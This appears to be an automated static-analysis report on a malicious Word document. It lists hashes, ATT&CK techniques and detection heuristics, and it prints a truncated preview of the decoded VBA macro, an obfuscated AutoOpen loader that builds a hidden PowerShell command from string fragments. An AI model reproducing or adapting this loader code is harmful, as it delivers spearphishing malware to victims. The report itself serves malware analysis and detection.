Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f83f98dc636339d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 237.8 KB
Created: 2018-07-05 09:58:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: e679f63abdaed4de212ac31bc5b613e7
SHA-1: 92ba51d0583b256752d3ec165d6d5281c4855696
SHA-256: 3f83f98dc636339d2bc5f361b4e3699888f123092f1bacb234e0704be26319f6
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing an obfuscated VBA macro. The AutoOpen macro triggers the execution of a PowerShell command by concatenating strings to form the command: "powershell -nop -w hidden -c \"$sShellid[1] + '$SShellid[13]' + 'X'\" ( ( '103X43>23Q17I126-45Q38j52X110m44-33'". This indicates the document is likely a spearphishing attachment intended to download and execute a second-stage payload.

Heuristics (8)

  • OLE_VBA_MACROS: VBA macros detected (severity: medium; 5 related findings)
    Document contains VBA macro code
  • OLE_VBA_SHELL: Shell() call in VBA (severity: critical)
    Shell() call in VBA
  • OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Obfuscated auto-exec VBA loader (severity: critical)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • OLE_VBA_AUTOOPEN: AutoOpen macro (severity: high)
    AutoOpen macro
  • OLE_VBA_CREATEOBJ: CreateObject call (severity: high)
    CreateObject call
  • OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens (severity: high)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker (severity: medium)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL: Embedded URL (severity: info)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12889 bytes
SHA-256: dea5ec0497f1073351279df4ee064d22cdc73a36966fc1fc4e087ad5da4055a5

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "TjSpPTVmMA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   DviKAw = (83353 / IkWns) - 52102 - 87069
   DaWzt = (96278 / rhZMrp) - 4900 - 64052
   AORLV = (30200 / uhpTS) - 18714 - 33717
   KjVsZS = (92160 / RCApa) - 9177 - 34667
OVXSBbFTzTb (PJpwSu + dzUYtKDd + UIosqizH)
   GEDNH = (64017 / HDLId) - 46921 - 45172
   qbfoQ = (65607 / BstiO) - 52864 - 98959
End Sub


Attribute VB_Name = "dhMFmfjjsJdWf"
Function PJpwSu()
On Error Resume Next
OLlGdO = (sJhKV * 91514 * 90914 + MwMCw - 7750 - YwiOsQ * TvfPUo / WWRzn * (bHczm + Sviwi - 36918 * lmnXO))
   jTZIOC = ONlBw - lzzGQ + uDdHdv / 23046 + zkpnT - UUHfLl
   AqmfGb = (kqZvF * 20114 * 98731 + RWkcT - 97103 - kwwvwC * jwDbnE / UzrKSh * (IDdIW + VQnmCB - 7586 * piKdE))
QjRTQw = "wers" + "hell" + "       " + "     " + "      ." + Chr(40) + " $SHe" + "llid[1"
nntuhT = (zDkaQ * 94066 * 46338 + nBizK - 60430 - hJSkuB * iHhijN / TjPwVB * (KOwdji + kjLBF - 18216 * jcwYz))
   AiRvp = (ZCqsql * 55890 * 16189 + TDrIv - 96133 - OrnidA * iOPDF / iwjWs * (GzRpJ + vHhfP - 9371 * NXPaHK))
   rdWvRw = (sRBQr * 53955 * 86732 + nbUJS - 21851 - YmAfi * hhNcw / LzmbRZ * (uUAkMd + PXBjvo - 30071 * EkvmRK))
   cshNK = (USSCo * 56628 * 95237 + vTGOT - 47894 - YWhiDr * GSYWiI / VRQVdn * (QINbL + oIpJfu - 57348 * VAiHN))
PCqwPKMT = "]" + Chr(43) + "$sHe" + "llid[1" + "3]" + Chr(43) + "'X'" + Chr(41) + " " + Chr(40) + Chr(40) + " '1" + "03X43" + ">23Q17I12" + "6-45Q" + "38j5" + "2X11" + "0m44-33"
zJjpW = (ImDAiU * 47411 * 90093 + WGVww - 94710 - iCJRnJ * HzDCI / lFSAI * (mZjzL + JZsNKA - 49070 * BijfE))
   HdaiXs = (XWVQjr * 56623 * 94179 + idisi - 6279 - LOrsOV * LjqUr / PadDXK * (uoIWt + Ychdj - 6221 * iPTfz))
   mwCbSP = (TRnUqm * 20937 * 43730 + DzmdkH - 87860 - DcEJHY * vJKAdd / tOZGb * (pJntij + iRVOiC - 30801 * qLaMs))
bZiDTijC = "Q41j38k3" + "2m55" + "X99A13-38" + "j55,109" + "I20j3" + "8,33,0>4" + "7Q42>38>4" + "5Q55Q1" + "20m1" + "03k41-0," + "54A126" + ">100"
tjQdct = (wbjWK * 44562 * 82772 + VBDCIk - 59323 - ifuRF * bYMAB / mNXXDW * (TMXUR + LKARCb - 24312 * Lizib))
   bKtUfE = (DdfTw * 87029 * 79326 + iauEd - 76965 - VaNzCD * tiaQcL / lLzdtR * (wjTiBz + lwvvtf - 78237 * GfCUF))
YtdqQBPVtu = "k43-55>5" + "5j51X121," + "108m10" + "8-52,5" + "2m52Q109" + ">34,4" + "8,42" + "A37X3"
bErXZM = (HwzjOp * 7843 * 8634 + FjLYX - 18367 - ipwzsw * aPCWc / ujQRK * (XmZXaS + iuAVA - 19632 * RIhcM))
   ZipCpz = (BFQpoH * 95029 * 84371 + Pcikm - 69370 - ZjpTOj * zZwRv / ljuji * (JppnoV + FtimB - 5029 * vQTzjY))
   LJJVA = (Hijwl * 67584 * 21692 + LKcpt - 14639 - HJZoba * ZobMWS / NLvbD * (WlDpd + DWmGm - 30798 * ZEAkj))
   lZRLT = (mbYSuO * 51717 * 72870 + JRWjX - 27674 - ZtCMK * lzoEL / mNHMGr * (HVhbmj + QzPFfb - 92353 * zXJHR))
IYLamGbFsEf = "4Q33Q42I" + "43I109m" + "32k44" + "k46A108I4" + "1>57" + "m44m108" + "Q3I4" + "3A55A55A" + "51A121k" + "108j1"
WKBAi = (GvYwzC * 83548 * 14733 + twRosM - 52708 - waYnMw * pvDvi / VzEdj * (YizXDX + WqhMQ - 12363 * OCaFzt))
   EcOjZ = (vwHcN * 39553 * 67947 + Znhizs - 23316 - wOtia * TZOBC / uPFVfb * (ztvWPV + YNnbIz - 94234 * izmqpl))
   QrpBo = (jiwFpa * 88678 * 68382 + AwGiJU - 74967 - PGIVQv * FfGYZv / TTYNwo * (NPAjWw + Rntwdw - 49448 * fLQnwA))
   JDwvc = (XzNKM * 28621 * 6403 + BCVPp - 50741 - Hjnpk * TWwdm / IVtZHv * (wrUBE + rwAYjk - 8963 * wBUKG))
AlOdCI = "08A52X52X" + "52X109I" + "39m42k48k" + "51X44k5" + "7A42A32Q4" + "2A41j34" + "I109m5" + "3>42X" + "34Q46X38" + ">39X4" + "2m34m109"
PJpwSu = QjRTQw + PCqwPKMT + bZiDTijC + YtdqQBPVtu + IYLamGbFsEf + AlOdCI
   OVijiO = (aKOGz * 28810 * 90803 + zaKbI - 99015 - Gqhvp * DwJDQu / FXczwf * (lMNQYi + cCEHd - 81111 * OswiZ))
   MSmhK = (LDVwMZ * 5727 * 86152 + MdkFmn - 86249 - zHlGi * mKWKhJ / iPOfbY * (DkMbGI + LBXwaT - 30105 * ZYccOj))
   MECiT = (EbzLfd * 5496 * 55317 + dRXKba - 91428 - vnEwq * iQWwZY / KiE
... (truncated)